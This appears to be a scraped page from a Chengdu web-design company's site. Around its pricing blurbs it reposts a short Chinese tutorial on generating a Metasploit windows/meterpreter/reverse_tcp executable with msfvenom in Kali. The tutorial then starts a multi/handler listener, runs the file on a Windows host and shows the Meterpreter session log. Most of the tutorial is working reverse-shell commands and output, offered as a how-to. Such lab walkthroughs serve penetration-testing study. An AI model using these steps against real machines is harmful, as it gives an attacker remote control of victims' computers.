网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

Kali下Metasploit的shellcode在windows中的使用

网络拓扑:
Kali下Metasploit的shellcode在windows中的使用
kaili系统版本:
Kali下Metasploit的shellcode在windows中的使用
注:前面的版本在生成shellcode的时候用的是msfpayload命令

创新互联建站专注于企业成都全网营销推广、网站重做改版、崇义网站定制设计、自适应品牌网站建设、H5建站商城系统网站开发、集团公司官网建设、成都外贸网站制作、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为崇义等各大城市提供网站开发制作服务。

1.kaili生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.侦听shellcode:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 192.168.152.131:1211 

3.将生成的sehllcode上传至windows主机中并运行:
Kali下Metasploit的shellcode在windows中的使用

4.已经有session返回

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.152.131:1211 

[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000

5.成功拿到shell:
Kali下Metasploit的shellcode在windows中的使用


当前名称:Kali下Metasploit的shellcode在windows中的使用
本文链接:http://bjjierui.cn/article/ggpgpg.html

其他资讯